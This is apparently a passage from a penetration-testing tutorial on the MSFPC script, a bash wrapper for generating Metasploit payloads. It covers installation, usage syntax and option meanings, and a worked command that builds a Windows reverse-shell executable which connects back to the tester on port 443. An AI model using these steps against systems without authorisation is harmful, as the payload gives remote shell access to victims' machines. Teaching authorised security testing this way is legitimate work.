MSFvenom Payload Creator

MSFvenom Payload Creator (MSFPC) is a user-friendly multiple payload generator that can be used to generate Metasploit payloads based on user-selected options. The user doesn't need to execute the long msfvenom commands to generate payloads anymore. With MSFPC, the user can generate the payloads with far fewer commands.

Before downloading the tool, Metasploit should be installed in the system. MSFPC is just a simple bash script, which means that it can be executed on *nix systems.

We can download the MSFPC package from https://github.com/g0tmi1k/mpc. We can either download the repository in a ZIP file or we can clone the repository on our local system by running the following command:

git clone https://github.com/g0tmi1k/mpc

After cloning the repo, let's issue an execute permission on msfpc.sh file.

cd mpc/
chmod +x msfpc.sh ./msfpc.sh
./msfpc.sh <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)

  • TYPE: The payload could be of any of the following formats (this option is the same as the -f switch in msfvenom): APK [android], ASP, ASPX, Bash [.sh], Java [.jsp], Linux [.elf], OSX [.macho], Perl [.pl], PHP, Powershell [.ps1], Python [.py], Tomcat [.war], Windows [.exe //.dll].
  • DOMAIN/IP: This is the LHOST option when generating payloads in msfvenom.
  • PORT: This is the LPORT option when generating payloads in msfvenom.
  • CMD/MSF: This is the type of shell dropped once the payload is executed on the target system. The CMD option can be used when you want to get a standard command shell; that is, the Command Prompt shell (cmd.exe) for Windows and Terminal (/bin/bash) for *nix. In some cases, where the size of the shellcode matters, it's better to use the classic reverse shell payload. CMD can be used in situations like these.

Generating a simple classic reverse shell payload can be done by executing the following command:

sh msfpc.sh cmd windows en0 

The preceding command will generate a payload with a cmd as the preferred shell for Windows and set the LHOST to the IP retrieved from the en0 Ethernet interface:

As you can see from the preceding screenshot, MSFPC created two files in the same directory:

  • The executable payload: windows-shell-staged-reverse-tcp-443.exe
  • The resource file: windows-shell-staged-reverse-tcp-443-exe.rc

The naming convention for the files are easy to understand as they are named after the options used while creation. We just created a Windows staged (explained later in this chapter) executable when executed on the target server will connect back to our system (reverse connection) on our local port 443 and drop us a command prompt shell. Hence, windows-shell-staged-reverse-tcp-443.exe. It is preferred to have a reverse shell instead of a bind shell (explained in the further chapters)